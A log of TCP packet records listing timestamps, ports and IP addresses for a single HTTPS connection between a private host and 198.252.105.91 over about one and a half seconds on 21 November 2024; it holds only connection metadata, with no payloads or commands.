Nov 21, 2024 17:00:15.202800035 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.202809095 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.202846050 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.209460974 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.209484100 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.209556103 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.209563971 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.209605932 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.217134953 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.217158079 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.217231035 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.217238903 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.217283010 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.225042105 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.225079060 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.225122929 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.225130081 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.225145102 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.225167036 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.232285976 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.232319117 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.232398033 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.232404947 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.232436895 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.232445955 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.239386082 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.239413977 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.239464045 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.239473104 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.239483118 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.239511967 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.284944057 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.284974098 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.285060883 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.285073042 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.285114050 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.405128956 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.405160904 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.405251026 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.405273914 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.405328035 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.412853956 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.412884951 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.412950993 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.412962914 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.413003922 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.420644045 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.420666933 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.420752048 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.420764923 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.420808077 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.427479982 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.427500010 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.427567005 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.427577019 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.427625895 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.434603930 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.434629917 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.434712887 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.434721947 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.434762001 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.443269968 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.443289995 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.443430901 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.443439960 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.443481922 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.449712992 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.449731112 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.449840069 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.449847937 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.449898005 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.609397888 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.609426975 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.609481096 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.609517097 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.609533072 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.609574080 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.615576982 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.615607977 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.615670919 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.615689993 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.615706921 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.615729094 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.623198032 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.623228073 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.623285055 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.623295069 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.623342037 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.631062031 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.631086111 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.631127119 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.631134987 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.631159067 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.631170034 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.637851954 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.637888908 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.637923002 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.637931108 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.637953997 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.637974977 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.646136999 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.646166086 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.646228075 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.646256924 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.646271944 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.646297932 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.653302908 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.653332949 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.653378963 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.653408051 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.653424025 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.653448105 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.660922050 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.660949945 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.660988092 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.660995007 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.661020994 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.661037922 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.819765091 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.819796085 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.819936991 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.819957018 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.820003986 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.826667070 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.826689005 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.826776028 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.826792955 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.826834917 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.833444118 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.833460093 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.833525896 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.833534956 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.833565950 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.833585024 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.841321945 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.841337919 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.841398954 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.841408014 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.841430902 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.841454983 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.849069118 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.849085093 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.849256039 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.849256039 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.849266052 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.849317074 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.856266022 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.856281996 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.856338978 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.856347084 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.856394053 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.864088058 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.864104986 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.864150047 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.864160061 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.864188910 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.864203930 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.871459961 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.871476889 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.871539116 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.871546030 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:15.871556044 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:15.871586084 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.030756950 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.030783892 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.031008959 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.031037092 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.031094074 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.037117958 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.037143946 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.037221909 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.037240028 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.037292957 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.039002895 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.044827938 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.044855118 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.044919014 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.044930935 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.044964075 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.044991970 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.051654100 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.051678896 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.051793098 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.051809072 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.051851988 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.059479952 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.059506893 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.059638023 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.059655905 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.059711933 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.066821098 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.066843987 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.066946030 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.066963911 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.067001104 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.067496061 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.074503899 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.074523926 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.074759007 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.074774027 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.074826002 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.082120895 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.082142115 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.082238913 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.082261086 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.082304955 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.241256952 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.241301060 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.241379023 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.241403103 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.241446018 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.247426033 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.247450113 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.247500896 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.247509956 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.247558117 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.255157948 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.255183935 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.255243063 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.255250931 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.255275965 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.255294085 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.262944937 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.262970924 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.263031960 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.263040066 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.263072014 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.263092041 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.270682096 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.270704985 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.270767927 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.270776033 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.270807981 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.270817995 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.277934074 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.277954102 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.278024912 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.278033018 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.278072119 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.284749985 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.284771919 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.284830093 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.284837961 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.284869909 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.284884930 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.293159962 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.293180943 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.293221951 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.293230057 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.293266058 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.293281078 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.451529026 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.451579094 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.451622963 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.451633930 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.451654911 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.451692104 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.457904100 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.457923889 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.457994938 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.458005905 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.458045959 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.465622902 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.465641975 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.465708971 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.465717077 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.465758085 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.473414898 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.473433971 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.473484993 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.473490953 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.473531008 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.480324030 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.480348110 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.480387926 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.480395079 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.480423927 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.480441093 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.488554955 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.488575935 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.488637924 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.488646984 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.488684893 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.496795893 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.496818066 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.496889114 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.496896982 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.496934891 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.503602982 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.503631115 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.503665924 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.503673077 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.503699064 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.503707886 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.560805082 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.662137032 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.662163973 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.662209034 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.662220955 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.662250996 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.662265062 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.669317007 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.669351101 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.669383049 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.669390917 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.669405937 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.669439077 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.676166058 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.676187992 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.676230907 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.676239014 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.676266909 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.676285028 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.683798075 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.683829069 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.683864117 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.683871031 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.683911085 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.683926105 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.691612005 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.691632032 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.691682100 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.691689014 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.691719055 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.691739082 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.698925972 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.698947906 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.698985100 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.699003935 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.699024916 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.699044943 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.706655025 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.706674099 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.706717968 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.706723928 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.706753969 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.706769943 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:16.714425087 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.714472055 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:16.714488983 CET	49713	443	192.168.2.10	198.252.105.91
